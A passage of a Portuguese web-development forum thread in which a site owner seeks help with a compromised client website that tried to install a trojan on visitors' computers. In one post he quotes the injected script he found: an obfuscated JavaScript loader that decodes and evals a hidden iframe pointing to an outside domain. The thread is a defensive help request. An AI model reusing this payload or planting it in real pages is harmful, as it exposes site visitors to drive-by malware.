rcdesign 1 Denunciar post Postado Janeiro 10, 2006 :angry: Pessoal, é o seguinte...Quando o site de um cliente (www.antropofocus.com.br) é aberto o IE e o Firefox detectam e bloqueiam (pelo menos aqui pra mim) a tentativa de gravação de um cookie de um tal stats4all.cc e também tenta abrir uma outra página www.trust4free.cs.O cliente já me avisou que visitantes do site informaram a ele que houve tentativas de instalação de um trojan em seus computadores quando entraram no site.Já verifiquei os arquivos do site, já solicitei ao suporte do servidor que fizesse uma varredura para encontrar alguma coisa e não consigo encontrar nada.Se alguém já passou por isso, me dê uma luz, por favor!!!!!Não sei mais o que fazer!! Compartilhar este post Link para o post Compartilhar em outros sites
carlosrcampos 0 Denunciar post Postado Janeiro 10, 2006 Kara,Pra mim aqui abriu normalmente e naveguei se problemas.... Compartilhar este post Link para o post Compartilhar em outros sites
rcdesign 1 Denunciar post Postado Janeiro 10, 2006 Então Carlos, No IE estava aparecendo a informação de bloqueio do cookie e pelo FireFox dava para acompanhar, pela barra de status, a tentativa de redirecionamento (ou abrir outra página) do outro site. Eu baixei todos os arquivos e verifiquei um por um novamente. Em um deles havia um script estranho que eu já havia retirado na semana passada e que voltou a aparecer.. <script>s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof(!xjeui>2!ifjhiu>2!tsd>(iuuq;00usvtu5gsff/xt0@je>joefy21(?=0jgsbnf?#*<';o='';for(i=0;i<113;i++){o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);</script> :angry: Com a retirada desse script o problema é resolvido.. pelo menos temporariamente... Compartilhar este post Link para o post Compartilhar em outros sites
Mário Monteiro 179 Denunciar post Postado Setembro 23, 2008 PROBLEMA RESOLVIDO! Caso o autor necessite que o tópico seja reaberto basta enviar uma Mensagem Privada para um Moderador com um link para o tópico. Compartilhar este post Link para o post Compartilhar em outros sites